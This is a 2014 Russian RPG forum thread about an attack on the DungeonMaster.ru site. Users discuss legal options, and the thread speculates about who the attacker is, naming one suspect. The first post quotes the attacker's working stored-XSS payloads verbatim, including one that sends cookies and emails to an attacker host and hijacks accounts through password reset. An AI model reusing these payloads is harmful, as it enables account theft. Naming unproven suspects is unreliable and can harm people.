RPG-ZONE
Новости Форумы Путеводитель FAQ (RPG) Библиотека «Пролёт Фантазии» «Штрихи Пролёта» Дайсы
>  Список форумов · Внутренний город · Трактир «Удар копытом по голове» Здравствуй, Гость (Вход · Регистрация)
Закрыто Боб 27-10-2014: Уже разморожен

Страницы: (3) [1] 2 3  Открыть все 
 Закрыта
 Новая тема
 Опрос

> Заморозка DungeonMaster.ru
   Сообщение № 1. 21.8.2014, 11:24, Боб пишет:
Боб
Don't boil me

*
Босс
Сообщений: 14270
профиль

Репутация: 789
Так. На ДМ произошли крайне неприятные события. Очень надеюсь, там скоро все поправят.
Адекватными мерами, на мой взгляд, являются восстановление сайта и обращение в правоохранительные органы с заявлением о преступлении по ст. 273 УК РФ.

Группа ДМ в Фейсбуке (думаю, ее итак все заинтересованные лица знают) тут: https://www.facebook.com/groups/178980498816975/
Помощи они не просили, но если есть что предложить, это было бы правильно.




Вейлор: решил выделить это в отдельный топик, и всё-таки обсудить, если будут новости.
Я буду писать прямо в пост Боба, всё что становится известно.

Update 24.08.2014

1) Ники хакера, по его сообщениям 19-20 августа в чате.
http://www.dungeonmaster.ru/Cabinet/?user=ololosha 13.12.13
http://www.dungeonmaster.ru/Cabinet/?user=ololoshasha 19.08.14
http://www.dungeonmaster.ru/Cabinet/?user=...oshastrikesback 19.08.14
Также поиск ботов даёт такой ник.
http://dungeonmaster.ru/Cabinet/?user=notdoneyet 19.08.14

2) Его сообщения из чата. 19'го числа были только проверки - работает ли ява-скрипт. 20го был собственно нанесён удар.

http://dungeonmaster.ru/Chat/Logs/19_08_14.txt и http://dungeonmaster.ru/Chat/Logs/20_08_14.txt

17:05 ololoshastrikesback

Код

<img src='http://eblan.org/wp-content/uploads/2011/04/vlastelin1.jpg' onload="jjavascript:var s = document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://lsd.bicycle-day.com/lsd.js';void(0);" onclick='' />


17:22 ololoshastrikesback

Код

<a href='http://nyan.cat' onMouseOver='var s = document.createElement("script");s.type="text/javascript";document.body.appendChild(s);s.src="http://lsd.bicycle-day.com/lsd.js";void(0);'>ссылка</a>


17:48 ololoshasha

Код

<a href='http://nyan.cat' onMouseOver='document.body.remove(document.body);'>ссылка</a>


20-08-2014 12:53 ololosha
Код

<a href='http://nyan.cat' onMouseOver='var s = document.createElement("script");s.type="text/javascript";document.body.appendChild(s);s.src="http://ololoshasha.esy.es/poison.php?data=Starting%20"+encodeURIComponent(document.cookie); var iframee=document.createElement("iframe");iframee.style="position:absolute;height:1px;width:1px;z-index:-999;border-width:0px";document.body.appendChild(iframee);iframee.onload=function(){if(window.poisonedd==true){void(0);} else {window.poisonedd=true;var mail = this.contentWindow.document.getElementById("ctl00_mainContent_UserProfile1_txtEmail");var z = document.createElement("script");z.type="text/javascript";document.body.appendChild(z);z.src="http://ololoshasha.esy.es/poison.php?data=OrigMail%20"+encodeURIComponent(mail.value);mail.value = mail.value.toString().split("@")[0]+"@dispostable.com";var w = document.createElement("script");w.type="text/javascript";document.body.appendChild(w);w.src="http://ololoshasha.esy.es/poison.php?data=NewMail%20"+encodeURIComponent(mail.value);window.newmail = mail.value; this.contentWindow.document.getElementById("ctl00_mainContent_btnUpdate").click();var r = document.createElement("script");r.type="text/javascript";document.body.appendChild(r);r.src="http://ololoshasha.esy.es/poison.php?data=Finishing%20"+encodeURIComponent(document.cookie);var iframeee=document.createElement("iframe");iframeee.style="position:absolute;height:1px;width:1px;z-index:-999;border-width:0px";document.body.appendChild(iframeee);iframeee.onload=function(){if(window.poisoneddd==2){void(0);} else if(window.poisoneddd==1) {window.poisoneddd=2;this.contentWindow.document.getElementById("ctl00_mainContent_txtEmail").value=window.newmail;this.contentWindow.document.getElementById("ctl00_mainContent_btnSubmit").click();var r = document.createElement("script");r.type="text/javascript";document.body.appendChild(r);r.src="http://ololoshasha.esy.es/poison.php?data=Finished%20"+encodeURIComponent(document.cookie);} else {window.poisoneddd=1;this.contentWindow.document.getElementById("ctl00_LoginView3_LoginStatus2").click();}};iframeee.src="http://"+document.domain+"/PasswordRecovery.aspx";}};iframee.src="http://"+document.domain+"/EditProfile.aspx";void(0);'>ссылка</a>



3) Мыло для регистрации сайта где лежал скрипт - tlkod@evopo.com - одноразовое, ничего с не вытянуть.

   Сообщение № 2. 21.8.2014, 13:53, Вейлор пишет:
Вейлор ( Offline )
. . .

*
Администратор
Сообщений: 5262
профиль

Репутация: 536
Я думаю ничего фатального у них не случилось, если админы не протупили.
Скорей всего кто-то (хакер) нашёл поля куда можно было что-то писать, но где не отрабатывала фильтрация кода (судя по переписке на ФБ это возможно чат).
ДМ это ж кажется во многом самописный проект? Таких полей могло быть несколько.

Наверное, хакер сбросил в уязвимое поле сниффер, в результате внедряется в код страницы ява-скрипт код, который исполняется на машине юзера, и отправляет автору сниффера данные, например, пароль в зашифрованном виде и логин.
Имея эти данные хакер скорей всего сможет зайти под чужими именами, и если под именем админа мог что-то стереть.

Не понятно а) кому это может быть нужно. б) успел ли хакер что-то стереть в) есть ли свежие бек-апы

Если что-то стёрто и свежих бек-апов нет, то всё может плохо.
Но если бек-апы есть, и с учётом того, что админы ДМ.ру как-то написали такой технически продвинутый сайт, то как минимум они смогут восстановиться, но возможно будет некоторый период простоя.
Если повезёт, то они просто включат форумы, ну максимум сбросят всем пароли.

Хотя судя по записи на главной, админ решил слиться.

   Сообщение № 3. 21.8.2014, 20:24, Шнобель пишет:
Шнобель ( Offline )
Странник

*
Заблокирован
Сообщений: 24
профиль

Репутация: 0
Цитата(Вейлор)
Хотя судя по записи на главной, админ решил слиться.

Малахольный он. я сам проверял.
пройдет пару дней, успокоится и возьмется за ум.

   Сообщение № 4. 21.8.2014, 21:23, Вейлор пишет:
Вейлор ( Offline )
. . .

*
Администратор
Сообщений: 5262
профиль

Репутация: 536
Шнобель
Цитата(Шнобель)
пройдет пару дней

Посмотрим, но как пример Ролемансер - полтора года валялся, с похожими причинами, что сейчас у ДМ.ру

   Сообщение № 5. 21.8.2014, 22:08, Аскетолог пишет:
Аскетолог ( Offline )
Демон-поэт

*
Графоман
Сообщений: 48
профиль

Репутация: 4
Хм, тогда, часть игроков/мастеров вернётся к вам, часть уйдёт куда-нибудь ещё(как пример, с тем же Ролом было).
Вообще, заявление на главной ДМа - уверенности не придаёт, это да. Ну, поживём - увидим...
З.Ы. Согласен с Бобом, обсуждать, какбэ, нечего.

   Сообщение № 6. 23.8.2014, 18:10, Зерг пишет:
Зерг ( Offline )
Странник

*
Неофит
Сообщений: 47
профиль

Репутация: 0
Ракот не решал слиться. В связи с нехваткой времени он хотел передать сайт кому-то другому и сам подолгу отсутствовал и отсутствует онлайн. Хакер этим воспользовался и начал ломать сайт.
Что касается статьи 273 ук рф, то она не подходит, никакие вредоносные программы не были использованы для взлома, только недостатки безопасности самого сайта. Другими словами, хакер вошёл не через закрытую дверь, а через дыру в стене, а этого никто не запрещает.

   Сообщение № 7. 23.8.2014, 18:33, Shooter__Andy пишет:
Shooter__Andy ( Offline )
(-8)Мастер, (-6)Игрок, (-8)Человек

*
Владыка Тьмы
Сообщений: 9097
профиль

Репутация: 101
Зерг
Цитата(Зерг)
никакие вредоносные программы не были использованы для взлома, только недостатки безопасности самого сайта

Разве там не были запущены скрипты, собиравшие инфу? Это попадает уже под определение, ЕМНИП.

   Сообщение № 8. 23.8.2014, 18:39, Зерг пишет:
Зерг ( Offline )
Странник

*
Неофит
Сообщений: 47
профиль

Репутация: 0
Какую инфу ? Он только угонял аккаунты, да и то вручную. Менял почту, используя то, что подтверждение для этого не надо.
Как он стёр комментарии и записи с форума я точно не знаю, с аккаунта Фионы вроде. Может кто-то пояснит.

   Сообщение № 9. 23.8.2014, 18:52, Shooter__Andy пишет:
Shooter__Andy ( Offline )
(-8)Мастер, (-6)Игрок, (-8)Человек

*
Владыка Тьмы
Сообщений: 9097
профиль

Репутация: 101
Ну, я-то не знаю, я там не был :) Я только из того, что прочитал:
Цитата
Только что мы вновь подверглись атаке от ололоши. Два скрипта были выброшены в чат и в обсуждение DM Tribune - на данный момент я рекомендую не заходить ни туда, ни туда.

Скрипты собирают информацию о почте пользователей.

   Сообщение № 10. 23.8.2014, 19:05, Зерг пишет:
Зерг ( Offline )
Странник

*
Неофит
Сообщений: 47
профиль

Репутация: 0
Ну так, потому что сайт не скрывает почту. Банальный запрос позволяет получить его в уязвимом месте - чате, как и было сказано выше Вейлором.
Он попросил, ему дали, он ничего не взламывал, поэтому статья не подходит. (

   Сообщение № 11. 23.8.2014, 19:13, YellowDragon пишет:
YellowDragon ( Offline )
даос

*
Автор
Сообщений: 1367
профиль

Репутация: 82
Имхо, не важно как это было сделано, важно, что это уничтожение/доступ чужой информации и доступ к чужой интеллектуальной собственности, например - профилям аккакунтов с возможностью их уничтожения/изменения. Стоило бы и правда обратиться в органы, дабы злоумышленник понимал, что он совершил в любом случае - преступление, не зависимо от того, будут его реально ловить или нет. Такая ситуация может случится на любом ресурсе и она очень неприятна.

   Сообщение № 12. 23.8.2014, 20:30, Аскетолог пишет:
Аскетолог ( Offline )
Демон-поэт

*
Графоман
Сообщений: 48
профиль

Репутация: 4
В действиях Ололоши есть состав преступления(и там не одна статья). Если он об этом не знал, или думал как-то иначе, то чо я могу сказать? У этого "героя", есть крайне опасное заблуждение )
А незнание закона, как известно, вину не облегчает.

   Сообщение № 13. 23.8.2014, 22:22, Вейлор пишет:
Вейлор ( Offline )
. . .

*
Администратор
Сообщений: 5262
профиль

Репутация: 536
Пока ловить-то особо некого. Я сейчас отписал на Хостингер, чтобы дали данные, какие есть по фейко-сайту Ололоши.
Конечно они могут и не ответить на майл, да и Ололоша, если умный, настоящие данные мог не светить.

Есть пока один подозреваемый, но пока доказательств особо никаких, так что называть не буду.

Админы ДМ.ру IP и почту его пусть посмотрят. Маловероятно, но может он засветил что-нибудь? Любая информация может быть полезна.

   Сообщение № 14. 24.8.2014, 00:39, Венг пишет:
Венг ( Offline )
When in doubt, shoot into a crowd.

*
Магистр
Сообщений: 426
профиль

Репутация: 14
Есть там статья вполне. И не одна.

Свернутый текст
Кроме скриптов для кражи акков, там, мягко говоря, рванули две "бомбы", вычистившие форум и обсуждения игр (на ДМе обсуждения отделены от игровых веток и хранятся отдельно). Так что с вредоносными программами там все ок. Но вот делал ли это один человек - вопрос. Ждем информации, переезжаем пока сюда.

   Сообщение № 15. 24.8.2014, 01:12, Вейлор пишет:
Вейлор ( Offline )
. . .

*
Администратор
Сообщений: 5262
профиль

Репутация: 536
В общем мои подозрения очень близки к уверенности, и если этот тот о ком я думаю, найти его в реале будет не проблема.
Сейчас мне нужны доп.данные от хостера фейко-сайта Ололоши (я им написал) и / или от админов ДМ.ру (написал вКонтактик группы http://vk.com/club376658 чтобы дали доп.данные).

В первом сообщении буду выкладывать факты, по мере их получения.

   Сообщение № 16. 24.8.2014, 01:26, Фех пишет:
Фех ( Offline )
Очень социальный

*
Фантазёр
Сообщений: 7402
профиль

Репутация: 305
Вейлор сейчас для меня словно пресонаж "декер" из CP 2020
:kz:

   Сообщение № 17. 24.8.2014, 01:29, Венг пишет:
Венг ( Offline )
When in doubt, shoot into a crowd.

*
Магистр
Сообщений: 426
профиль

Репутация: 14
Цитата(Фех)
Вейлор сейчас для меня словно пресонаж "декер" из CP 2020


В СР 2020 нет декеров, там есть нетраннеры, хотя их "орудия труда" называются деками. Декеры это Шэдоуран.

Попробую кое-кого спросить насчет IP и т.д.

_________________
:kz: "Декером в киберпанковских ролевых играх, таких как Cyberpunk 2020 или Shadowrun, называют эксперта-компьютерщика, специализирующийся в работе с киберпространством. В обеих играх для значительных действий в киберпространстве требуется быть декером." Отсюда взято
Фех


Вот только корбук СР 2020 считает, что персонаж "эксперт-компьютерщик" там Netrunner. Думаю, корбуку лучше знать.

   Сообщение № 18. 24.8.2014, 01:44, ZatriX пишет:
ZatriX ( Offline )
Странник

*
Неофит
Сообщений: 4
профиль

Репутация: 0
Цитата(Зерг)
Как он стёр комментарии и записи с форума я точно не знаю, с аккаунта Фионы вроде. Может кто-то пояснит.

Полностью чистить ветки может только админ на ДМе, у модера нет таких полномочий. К тому же они почистились некорректно - остались дата комментария и ник запостившегося, было убито собственно тело. Явно скриптово, причем это уже похоже не на джава, а на SQL-инъекцию.


Цитата(Вейлор)
Наверное, хакер сбросил в уязвимое поле сниффер, в результате внедряется в код страницы ява-скрипт код, который исполняется на машине юзера, и отправляет автору сниффера данные, например, пароль в зашифрованном виде и логин.
Имея эти данные хакер скорей всего сможет зайти под чужими именами, и если под именем админа мог что-то стереть.

Скрипт в его рабочем состоянии сначала появился в обсуждении модуля DM-Tribune в 13.00 по Москве 20го числа. Представляет из себя картинку белого пикселя, залитую на радикал, которая выполняет javascript по триггеру onLoad, подзватывая исполняемый код со стороннего сайта. Код берет email пользователя, меняет его на сторонний и затребывает смену пароля нв новый адрес, угоняя акк.

Примерно в это же время недоработанным скриптом (полагаю этим же) был заблокирован чат.

После этого, когда злоумышленник (назовем его так) получил контроль над акком модератора, скрипт был вывешен на главную. Люди, успевшие вернуть акки заблоировали яву на компах и какое-то время еще функционировали. Ближе к ночи был нанесен удар по базам.

Такие дела.

Айпишники, затребованные выше скину с утра.

   Сообщение № 19. 24.8.2014, 01:47, Венг пишет:
Венг ( Offline )
When in doubt, shoot into a crowd.

*
Магистр
Сообщений: 426
профиль

Репутация: 14
На всякий случай.

Написанному выше верить, Затрикс может предоставить информацию и описанная им ситуация правдива. Если у кого будут вопросы, спрашивайте в ПМ.

   Сообщение № 20. 24.8.2014, 02:18, Вейлор пишет:
Вейлор ( Offline )
. . .

*
Администратор
Сообщений: 5262
профиль

Репутация: 536
А, к чёрту ;) Давайте только не ломиться в профиль к тому на кого я думаю, пока мы не доказали что к чему на 100%.

Вот мои мысли.

т.к. для взлома использовались однотипные профили, видно что фантазии на ники не много
ololosha
ololoshasha
ololoshastrikesback

и использовался скрипт (что видно из кода в первом сообщении) ведущий на сайт http://ololoshasha.esy.es (это хостер "хостингер").

Но также есть сайт http://ololosha.esy.es (Внимание - пока его связь прямо не доказана с тем что использовался для воровства паролей). Этот сайт выводит на сайт (Не подтвердившаяся информация стёрта) (кстати бесплатный домен в зоне Токелау тоже ребята, готовые просто отдать 500 руб в год за домен, не получают. А вот обычно хакеры и т.п. продвинутые да. И хостинг там тоже "Хостингер" (скорей всего бесплатный), что видно если его пропинговать.).

Если будет подтверждение связи ololoshasha.esy.es и ololosha.esy.es (от хостера) или подтверждение что его почта засветилась на ДМ - то это он. Почта (Не подтвердившаяся информация стёрта)

(Не подтвердившаяся информация стёрта)

Есть кстати ещё и сайт ololo.esy.es - тоже на вид подозрительный (файл с какими-то награбленными видимо паролями).
Предполагаемые мотивы - он тоже игрок в ФРПГ, увидел ДМ.ру и решил потренироваться как программист.

Возможно на кого-то обиделся.
Зерг высказал предположение что это может быть некий Mensch (по словам Зерга мотивы у него есть, и место жительства примерно совпадает.).

(Не подтвердившаяся информация стёрта)

Сейчас ждём IP'шники от админом ДМ.ру. Проверку мыла. И ответ от Хостингера на моё письмо.

   Сообщение № 21. 24.8.2014, 03:47, AlarDyce пишет:
AlarDyce ( Offline )
Большой Змей

*
Автор
Сообщений: 1109
профиль

Репутация: 57
О! Если это точно он, то его действия, похоже, носили политическую окраску: меньше, чем за неделю до взлома новичком был запущен трешовый антиутопический модуль, в описании которого Украина сильно пострадала, Менш воспринял это как-то очень близко к сердцу и заявил, что не потерпит и объявляет войну. Всерьез, конечно, никто не принял, но тон у него был очень раздраженно-агрессивный. Сейчас, увы, не поднять, обсужд был почищен, но логи в админке должны остаться: я жалобу скидывал с цитатами. Вот и мотив, короче.

   Сообщение № 22. 24.8.2014, 07:42, GreyB пишет:
GreyB ( Offline )
Странник

*
Адепт
Сообщений: 102
профиль

Репутация: 1
Жесть. Ну вы даете, ребята. За считанные часы вычислили =)

   Сообщение № 23. 24.8.2014, 09:09, Вейлор пишет:
Вейлор ( Offline )
. . .

*
Администратор
Сообщений: 5262
профиль

Репутация: 536
AlarDyce
Если так, то политические мотивы у него жирно прослеживаются в инстаграмме и вКонтактике.

Но не обязательно именно Mensch. Возможно это его товарищ (а возможно совпадение вообще). Mensch судя по профилю на ДМ.ру Артём, а этот (Не подтвердившаяся информация стёрта).

Кстати, проблема на ДМ.ру, через которую взломали сайт, кажется даже проще чем я думал. Там получается просто работает чистый ява-скрипт в чате, без всяких ухищрений.
Может быть есть, конечно, ещё какие-то места. Но это можно проверить (на главную, я думаю, он закинул код, когда уже имел некие более широкие права, а так возможно дырки там нет).
На месте админов пока я бы просто отключил чат, и начал тестирование остального сайта.

   Сообщение № 24. 24.8.2014, 10:18, AlarDyce пишет:
AlarDyce ( Offline )
Большой Змей

*
Автор
Сообщений: 1109
профиль

Репутация: 57
Цитата(Вейлор)
Возможно это его товарищ, т.к. Mensch судя по профилю на ДМ.ру Артём, а этот (Не подтвердившаяся информация стёрта).

Да, вполне может быть и так. Во всяком случае круг тех, кто мог это сделать, сужается до украинской тусовки. Таки легче жить, когда не все вокруг на подозрении (и это я сейчас не про ксенофобию и "образ врага", а чисто географически).

   Сообщение № 25. 24.8.2014, 11:19, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Беда в другом, в Украине кабардак, а судить по Российскому закону его придется (ибо преступление совершено на территории РФ).
Никто его не выдаст. Эх...

   Сообщение № 26. 24.8.2014, 11:25, Боб пишет:
Боб
Don't boil me

*
Босс
Сообщений: 14270
профиль

Репутация: 789
Цитата(CheZzter)
Беда в другом, в Украине кабардак, а судить по Российскому закону его придется (ибо преступление совершено на территории РФ).
Никто его не выдаст. Эх...


Для начала нужно, чтобы кто-то, лучше всего владелец сайта хотя бы в полицию обратился. В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще.
А уж чем закончится, станут менты заморачиваться с расследованием или не станут - дело десятое.

   Сообщение № 27. 24.8.2014, 11:31, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Цитата(Боб)
Для начала нужно, чтобы кто-то, лучше всего владелец сайта хотя бы в полицию обратился. В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще.
А уж чем закончится, станут менты заморачиваться с расследованием или не станут - дело десятое.


Не, обратится может любой. Факт публичного по 273 УК РФ был. Заявку от любого могут принять, вопрос кто будет писать, и желательно из места нахождения хостинга сайта территориально (по идее).
С отрезвляющим эффектом - полностью согласен.
Про заморачиваться скажу прямо: методика расследований таких преступлений в РФ слаба и не разработана должным образом; лицо, предположительно, на Украине; имущество или иные права не были изъяты. Скорее откозняк сделают. Мало по таким составам расследуются дела. из 100 от силы с десяток.

   Сообщение № 28. 24.8.2014, 12:00, Боб пишет:
Боб
Don't boil me

*
Босс
Сообщений: 14270
профиль

Репутация: 789
Цитата(CheZzter)
обратится может любой


Просто к владельцу не возникнет вопросов типа "а ты что за хрен с горы". Плюс он же потенциальный потерпевший, а тот "любой" - нет, соответственно и процессуальных прав у него нет.
Хостинг у ДМ вроде Мастерхост? Где-то я видел краем глаза, может ошибаюсь. Тогда Москва, ЦАО, не помню точно, Мещанский там район или Басманный.

   Сообщение № 29. 24.8.2014, 12:03, AlarDyce пишет:
AlarDyce ( Offline )
Большой Змей

*
Автор
Сообщений: 1109
профиль

Репутация: 57
Цитата(Боб)
В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще.

Вот ни разу не верю при данном конкретном раскладе ни в правосудие, ни в "отрезвляющий эффект", вполне возможно даже, что чувствует себя наш "мини-Герострат" "бойцом невидимого фронта", например. Но вычислить кто это конкретно из юзеров все равно стоит, знание — вещь полезная.

   Сообщение № 30. 24.8.2014, 12:16, ZatriX пишет:
ZatriX ( Offline )
Странник

*
Неофит
Сообщений: 4
профиль

Репутация: 0
Отрезвляющий эффект - это битой, например :kz:

1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей);
« Предыдущая тема | Трактир «Удар копытом по голове» | Следующая тема »

Яндекс.Метрика